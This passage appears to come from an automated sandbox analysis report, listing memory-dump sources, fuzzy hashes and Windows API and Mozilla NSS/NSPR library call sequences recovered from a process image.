                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865764551.000000006CFBF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865853565.000000006CFC0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865945305.000000006CFC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_6cde0000_file.jbxd
                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                      • API ID: Unlock$CondCriticalCurrentEnterSectionThreadValue$LockNotifyWait
                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                      • API String ID: 3388019835-0
                                                                                                                                                                                                                                                                                                                      • Opcode ID: ed10069992d25257343963e61c5f14b66edef09f92954c7a19950ee7078ba0a5
                                                                                                                                                                                                                                                                                                                      • Instruction ID: 8696ea29971b0e7ee5e9f0670c51f8cfb417c28a679a3d94e3ed5d1112064508
                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ed10069992d25257343963e61c5f14b66edef09f92954c7a19950ee7078ba0a5
                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 01417FB1E14755CFCB40AFB9D08465ABBF4BF09318F058669D8889B720EB30E994CB91
                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                      • TlsGetValue.KERNEL32(00000000,?,?,6CE638A8,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CE638FF
                                                                                                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(?,?,?,?,6CE638A8), ref: 6CE63918
                                                                                                                                                                                                                                                                                                                      • PL_HashTableDestroy.NSS3(?,?,?,?,?,6CE638A8), ref: 6CE6392C
                                                                                                                                                                                                                                                                                                                      • PR_Unlock.NSS3(?,?,?,?,?,6CE638A8), ref: 6CE63941
                                                                                                                                                                                                                                                                                                                      • DeleteCriticalSection.KERNEL32(?,?,?,?,?,6CE638A8), ref: 6CE63952
                                                                                                                                                                                                                                                                                                                      • free.MOZGLUE(?,?,?,?,?,?,6CE638A8), ref: 6CE6395E
                                                                                                                                                                                                                                                                                                                      • TlsGetValue.KERNEL32(00000000,?,?,6CE638A8,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CE63981
                                                                                                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(?,?,?,?,6CE638A8), ref: 6CE63996
                                                                                                                                                                                                                                                                                                                      • PL_HashTableDestroy.NSS3(?,?,?,?,?,6CE638A8), ref: 6CE639AA
                                                                                                                                                                                                                                                                                                                      • PR_Unlock.NSS3(?,?,?,?,?,6CE638A8), ref: 6CE639BF
                                                                                                                                                                                                                                                                                                                      • DeleteCriticalSection.KERNEL32(?,?,?,?,?,6CE638A8), ref: 6CE639D0
                                                                                                                                                                                                                                                                                                                      • free.MOZGLUE(?,?,?,?,?,?,6CE638A8), ref: 6CE639DC
                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.1864410556.000000006CDE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CDE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1864270690.000000006CDE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865248315.000000006CF7F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865651933.000000006CFBE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865764551.000000006CFBF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865853565.000000006CFC0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865945305.000000006CFC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_6cde0000_file.jbxd
                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                      • API ID: CriticalSection$DeleteDestroyEnterHashTableUnlockValuefree
                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                      • API String ID: 2967110932-0
                                                                                                                                                                                                                                                                                                                      • Opcode ID: 1f0b2aee3f4dab3175e1a0016873c7441090012033a4b37cdbf009e804712c2f
                                                                                                                                                                                                                                                                                                                      • Instruction ID: a335316f2987ae15a86979c14f6adc6a715fd7997e3b6c2e957cac1ed71dc57f
                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1f0b2aee3f4dab3175e1a0016873c7441090012033a4b37cdbf009e804712c2f
                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 813130B4FA46028FDB40BF78C08C66ABBF4FB06308F11552AD89593700EB71A695DB91
                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                      • PR_GetCurrentThread.NSS3 ref: 6CF77CE0
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CF29BF0: TlsGetValue.KERNEL32(?,?,?,6CF70A75), ref: 6CF29C07
                                                                                                                                                                                                                                                                                                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CF77D36
                                                                                                                                                                                                                                                                                                                      • PR_Realloc.NSS3(?,00000080), ref: 6CF77D6D
                                                                                                                                                                                                                                                                                                                      • PR_GetCurrentThread.NSS3 ref: 6CF77D8B
                                                                                                                                                                                                                                                                                                                      • PR_snprintf.NSS3(?,?,NSPR_INHERIT_FDS=%s:%d:0x%lx,?,?,?), ref: 6CF77DC2
                                                                                                                                                                                                                                                                                                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CF77DD8
                                                                                                                                                                                                                                                                                                                      • malloc.MOZGLUE(00000080), ref: 6CF77DF8
                                                                                                                                                                                                                                                                                                                      • PR_GetCurrentThread.NSS3 ref: 6CF77E06
                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.1864410556.000000006CDE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CDE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1864270690.000000006CDE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865248315.000000006CF7F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865651933.000000006CFBE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865764551.000000006CFBF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865853565.000000006CFC0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865945305.000000006CFC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_6cde0000_file.jbxd
                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                      • API ID: CurrentThread$strlen$R_snprintfReallocValuemalloc
                                                                                                                                                                                                                                                                                                                      • String ID: :%s:%d:0x%lx$NSPR_INHERIT_FDS=%s:%d:0x%lx
                                                                                                                                                                                                                                                                                                                      • API String ID: 530461531-3274975309
                                                                                                                                                                                                                                                                                                                      • Opcode ID: cda4c8108b9d01114e200d565933d42ffb6ff55d2673b17af86a10f5df3970bf
                                                                                                                                                                                                                                                                                                                      • Instruction ID: 8a9282a389d6a43f4ee16f9d5d1492f95d24092fb91270af8d2b19f125e53b91
                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: cda4c8108b9d01114e200d565933d42ffb6ff55d2673b17af86a10f5df3970bf
                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0741E8B16102019FDB14CF28ED80AAB37BAFF84318B25456FE8199B751D731E951CBB1
                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CF77E37
                                                                                                                                                                                                                                                                                                                      • PR_GetEnvSecure.NSS3(NSPR_INHERIT_FDS), ref: 6CF77E46
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE51240: TlsGetValue.KERNEL32(00000040,?,6CE5116C,NSPR_LOG_MODULES), ref: 6CE51267
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE51240: EnterCriticalSection.KERNEL32(?,?,?,6CE5116C,NSPR_LOG_MODULES), ref: 6CE5127C
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE51240: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(?,?,?,?,6CE5116C,NSPR_LOG_MODULES), ref: 6CE51291
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE51240: PR_Unlock.NSS3(?,?,?,?,6CE5116C,NSPR_LOG_MODULES), ref: 6CE512A0
                                                                                                                                                                                                                                                                                                                      • PR_sscanf.NSS3(00000001,%d:0x%lx,?,?), ref: 6CF77EAF
                                                                                                                                                                                                                                                                                                                      • PR_ImportFile.NSS3(?), ref: 6CF77ECF
                                                                                                                                                                                                                                                                                                                      • PR_GetCurrentThread.NSS3 ref: 6CF77ED6
                                                                                                                                                                                                                                                                                                                      • PR_ImportTCPSocket.NSS3(?), ref: 6CF77F01
                                                                                                                                                                                                                                                                                                                      • PR_ImportUDPSocket.NSS3(?,?), ref: 6CF77F0B
                                                                                                                                                                                                                                                                                                                      • PR_ImportPipe.NSS3(?,?,?), ref: 6CF77F15
                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.1864410556.000000006CDE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CDE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1864270690.000000006CDE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865248315.000000006CF7F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865651933.000000006CFBE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865764551.000000006CFBF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865853565.000000006CFC0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865945305.000000006CFC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_6cde0000_file.jbxd
                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                      • API ID: Import$Socket$CriticalCurrentEnterFilePipeR_sscanfSectionSecureThreadUnlockValuegetenvstrlen
                                                                                                                                                                                                                                                                                                                      • String ID: %d:0x%lx$NSPR_INHERIT_FDS
                                                                                                                                                                                                                                                                                                                      • API String ID: 2743735569-629032437
                                                                                                                                                                                                                                                                                                                      • Opcode ID: 06720e290cd3c608e041ab39d4b3aad138e66ac8b465257b00f3f8dbfbea67e2
                                                                                                                                                                                                                                                                                                                      • Instruction ID: fa7c4a09c1d221f771d5d0aced3b2804fcd6b0763011ce66117fa171ff3fbb1d
                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 06720e290cd3c608e041ab39d4b3aad138e66ac8b465257b00f3f8dbfbea67e2
                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6A314871D24115CBEB229B69E840AEBB7B9FF0534CF100567D80197A11E7719D04C7F2
                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                      • TlsGetValue.KERNEL32 ref: 6CE84E90
                                                                                                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32 ref: 6CE84EA9
                                                                                                                                                                                                                                                                                                                      • TlsGetValue.KERNEL32 ref: 6CE84EC6
                                                                                                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32 ref: 6CE84EDF
                                                                                                                                                                                                                                                                                                                      • PL_HashTableLookup.NSS3 ref: 6CE84EF8
                                                                                                                                                                                                                                                                                                                      • PR_Unlock.NSS3 ref: 6CE84F05
                                                                                                                                                                                                                                                                                                                      • PR_Now.NSS3 ref: 6CE84F13
                                                                                                                                                                                                                                                                                                                      • PR_Unlock.NSS3 ref: 6CE84F3A
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE507A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6CDE204A), ref: 6CE507AD
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE507A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6CDE204A), ref: 6CE507CD
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE507A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6CDE204A), ref: 6CE507D6
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE507A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6CDE204A), ref: 6CE507E4
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE507A0: TlsSetValue.KERNEL32(00000000,?,6CDE204A), ref: 6CE50864
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE507A0: calloc.MOZGLUE(00000001,0000002C), ref: 6CE50880
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE507A0: TlsSetValue.KERNEL32(00000000,?,?,6CDE204A), ref: 6CE508CB
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE507A0: TlsGetValue.KERNEL32(?,?,6CDE204A), ref: 6CE508D7
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE507A0: TlsGetValue.KERNEL32(?,?,6CDE204A), ref: 6CE508FB
                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.1864410556.000000006CDE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CDE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1864270690.000000006CDE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865248315.000000006CF7F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865651933.000000006CFBE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865764551.000000006CFBF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865853565.000000006CFC0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865945305.000000006CFC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_6cde0000_file.jbxd
                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                      • API ID: Value$CriticalEnterSectionUnlockcalloc$HashLookupTable
                                                                                                                                                                                                                                                                                                                      • String ID: bUl$bUl
                                                                                                                                                                                                                                                                                                                      • API String ID: 326028414-3943757760
                                                                                                                                                                                                                                                                                                                      • Opcode ID: 58f36761f36757d9efc0666f86ca660af3e2d05c7cb01fdde261d9afa5f7b46e
                                                                                                                                                                                                                                                                                                                      • Instruction ID: e233566a127c66c6f686fb7a27db21a2a212976bea86fc0590f332750c2e9aad
                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 58f36761f36757d9efc0666f86ca660af3e2d05c7cb01fdde261d9afa5f7b46e
                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A8414EB4A006059FCB00EF78C09496ABBF4FF49318F11856AEC999B711EB30E855CF91
                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                      • PL_InitArenaPool.NSS3(?,security,00000800,00000008,?,?,?,?,?,?,?,?,00000000,?,?,6CEADE64), ref: 6CEAED0C
                                                                                                                                                                                                                                                                                                                      • SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CEAED22
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEBB030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6CF918D0,?), ref: 6CEBB095
                                                                                                                                                                                                                                                                                                                      • PL_FreeArenaPool.NSS3(?), ref: 6CEAED4A
                                                                                                                                                                                                                                                                                                                      • PL_FinishArenaPool.NSS3(?), ref: 6CEAED6B
                                                                                                                                                                                                                                                                                                                      • PR_CallOnce.NSS3(6CFC2AA4,6CEC12D0), ref: 6CEAED38
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CDE4C70: TlsGetValue.KERNEL32(?,?,?,6CDE3921,6CFC14E4,6CF2CC70), ref: 6CDE4C97
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CDE4C70: EnterCriticalSection.KERNEL32(?,?,?,?,6CDE3921,6CFC14E4,6CF2CC70), ref: 6CDE4CB0
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CDE4C70: PR_Unlock.NSS3(?,?,?,?,?,6CDE3921,6CFC14E4,6CF2CC70), ref: 6CDE4CC9
                                                                                                                                                                                                                                                                                                                      • SECOID_FindOID_Util.NSS3(?), ref: 6CEAED52
                                                                                                                                                                                                                                                                                                                      • PR_CallOnce.NSS3(6CFC2AA4,6CEC12D0), ref: 6CEAED83
                                                                                                                                                                                                                                                                                                                      • PL_FreeArenaPool.NSS3(?), ref: 6CEAED95
                                                                                                                                                                                                                                                                                                                      • PL_FinishArenaPool.NSS3(?), ref: 6CEAED9D
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEC64F0: free.MOZGLUE(00000000,00000000,00000000,00000000,?,6CEC127C,00000000,00000000,00000000), ref: 6CEC650E
                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.1864410556.000000006CDE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CDE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1864270690.000000006CDE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865248315.000000006CF7F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865651933.000000006CFBE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865764551.000000006CFBF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865853565.000000006CFC0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865945305.000000006CFC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_6cde0000_file.jbxd
                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                      • API ID: ArenaPool$CallFinishFreeOnceUtil$CriticalDecodeEnterErrorFindInitItem_QuickSectionUnlockValuefree
                                                                                                                                                                                                                                                                                                                      • String ID: security
                                                                                                                                                                                                                                                                                                                      • API String ID: 3323615905-3315324353
                                                                                                                                                                                                                                                                                                                      • Opcode ID: 12ccc5f7f511fcb08585e2d6077f384969b692d0281683f68f2f76efa2c43576
                                                                                                                                                                                                                                                                                                                      • Instruction ID: 9c882a08f736db13e3aa6e0b2ea88b8838ae93dcac97438ae1f4ad5ff71f7807
                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 12ccc5f7f511fcb08585e2d6077f384969b692d0281683f68f2f76efa2c43576
                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B2116D75B006046FE71057B5AC44BBB7278BF4260DF200428E82167F40FB25A51EC6E7
                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                      • PR_LogPrint.NSS3(Aborting,?,6CE52357), ref: 6CF70EB8
                                                                                                                                                                                                                                                                                                                      • abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(6CE52357), ref: 6CF70EC0
                                                                                                                                                                                                                                                                                                                      • PR_LogPrint.NSS3(Assertion failure: %s, at %s:%d,00000000,00000001,?,00000001,00000000,00000000), ref: 6CF70EE6
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CF709D0: PR_Now.NSS3 ref: 6CF70A22
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CF709D0: PR_ExplodeTime.NSS3(00000000,?,?,?), ref: 6CF70A35
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CF709D0: PR_snprintf.NSS3(?,000001FF,%04d-%02d-%02d %02d:%02d:%02d.%06d UTC - ,?,?,?,?,?,?,?), ref: 6CF70A66
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CF709D0: PR_GetCurrentThread.NSS3 ref: 6CF70A70
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CF709D0: PR_snprintf.NSS3(?,000001FF,%ld[%p]: ,00000000,00000000), ref: 6CF70A9D
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CF709D0: PR_vsnprintf.NSS3(-FFFFFDF0,000001FF,?,?), ref: 6CF70AC8
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CF709D0: PR_vsmprintf.NSS3(?,?), ref: 6CF70AE8
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CF709D0: EnterCriticalSection.KERNEL32(?), ref: 6CF70B19
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CF709D0: OutputDebugStringA.KERNEL32(00000000), ref: 6CF70B48
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CF709D0: _PR_MD_UNLOCK.NSS3(?), ref: 6CF70C76
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CF709D0: PR_LogFlush.NSS3 ref: 6CF70C7E
                                                                                                                                                                                                                                                                                                                      • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,00000001,00000000,00000000), ref: 6CF70EFA
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE5AEE0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000001,?,00000000,?,00000001,?,?,?,00000001,00000000,00000000), ref: 6CE5AF0E
                                                                                                                                                                                                                                                                                                                      • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CF70F16
                                                                                                                                                                                                                                                                                                                      • fflush.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CF70F1C
                                                                                                                                                                                                                                                                                                                      • DebugBreak.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CF70F25
                                                                                                                                                                                                                                                                                                                      • abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CF70F2B
                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.1864410556.000000006CDE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CDE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1864270690.000000006CDE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865248315.000000006CF7F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865651933.000000006CFBE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865764551.000000006CFBF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865853565.000000006CFC0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865945305.000000006CFC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_6cde0000_file.jbxd
                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                      • API ID: DebugPrintR_snprintf__acrt_iob_funcabort$BreakCriticalCurrentEnterExplodeFlushOutputR_vsmprintfR_vsnprintfSectionStringThreadTime__stdio_common_vfprintffflush
                                                                                                                                                                                                                                                                                                                      • String ID: Aborting$Assertion failure: %s, at %s:%d
                                                                                                                                                                                                                                                                                                                      • API String ID: 3905088656-1374795319
                                                                                                                                                                                                                                                                                                                      • Opcode ID: b82b373855de5de20dc59084cc97584b6a7e18a3cb16c2fa1ab2a33ece2cf5c1
                                                                                                                                                                                                                                                                                                                      • Instruction ID: df8f5008922cfebea2bb3078293cab5715cf40c6c56723c327f839c2699478db
                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b82b373855de5de20dc59084cc97584b6a7e18a3cb16c2fa1ab2a33ece2cf5c1
                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: ADF028B9E001047BDE403BA0DC89E9B3E3CDF46324F004024FD1946702DB76E91487B6
                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                      • PORT_NewArena_Util.NSS3(00000400), ref: 6CED4DCB
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEC0FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6CE687ED,00000800,6CE5EF74,00000000), ref: 6CEC1000
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEC0FF0: PR_NewLock.NSS3(?,00000800,6CE5EF74,00000000), ref: 6CEC1016
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEC0FF0: PL_InitArenaPool.NSS3(00000000,security,6CE687ED,00000008,?,00000800,6CE5EF74,00000000), ref: 6CEC102B
                                                                                                                                                                                                                                                                                                                      • PORT_ArenaAlloc_Util.NSS3(00000000,0000001C), ref: 6CED4DE1
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEC10C0: TlsGetValue.KERNEL32(?,6CE68802,00000000,00000008,?,6CE5EF74,00000000), ref: 6CEC10F3
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEC10C0: EnterCriticalSection.KERNEL32(?,?,6CE68802,00000000,00000008,?,6CE5EF74,00000000), ref: 6CEC110C
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEC10C0: PL_ArenaAllocate.NSS3(?,?,?,6CE68802,00000000,00000008,?,6CE5EF74,00000000), ref: 6CEC1141
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEC10C0: PR_Unlock.NSS3(?,?,?,6CE68802,00000000,00000008,?,6CE5EF74,00000000), ref: 6CEC1182
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEC10C0: TlsGetValue.KERNEL32(?,6CE68802,00000000,00000008,?,6CE5EF74,00000000), ref: 6CEC119C
                                                                                                                                                                                                                                                                                                                      • PORT_ArenaAlloc_Util.NSS3(?,0000001C), ref: 6CED4DFF
                                                                                                                                                                                                                                                                                                                      • SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6CED4E59
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEBFAB0: free.MOZGLUE(?,-00000001,?,?,6CE5F673,00000000,00000000), ref: 6CEBFAC7
                                                                                                                                                                                                                                                                                                                      • SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6CF9300C,00000000), ref: 6CED4EB8
                                                                                                                                                                                                                                                                                                                      • SECOID_FindOID_Util.NSS3(?), ref: 6CED4EFF
                                                                                                                                                                                                                                                                                                                      • memcmp.VCRUNTIME140(?,00000000,00000000), ref: 6CED4F56
                                                                                                                                                                                                                                                                                                                      • PORT_FreeArena_Util.NSS3(?,00000000), ref: 6CED521A
                                                                                                                                                                                                                                                                                                                      Memory Dump Source
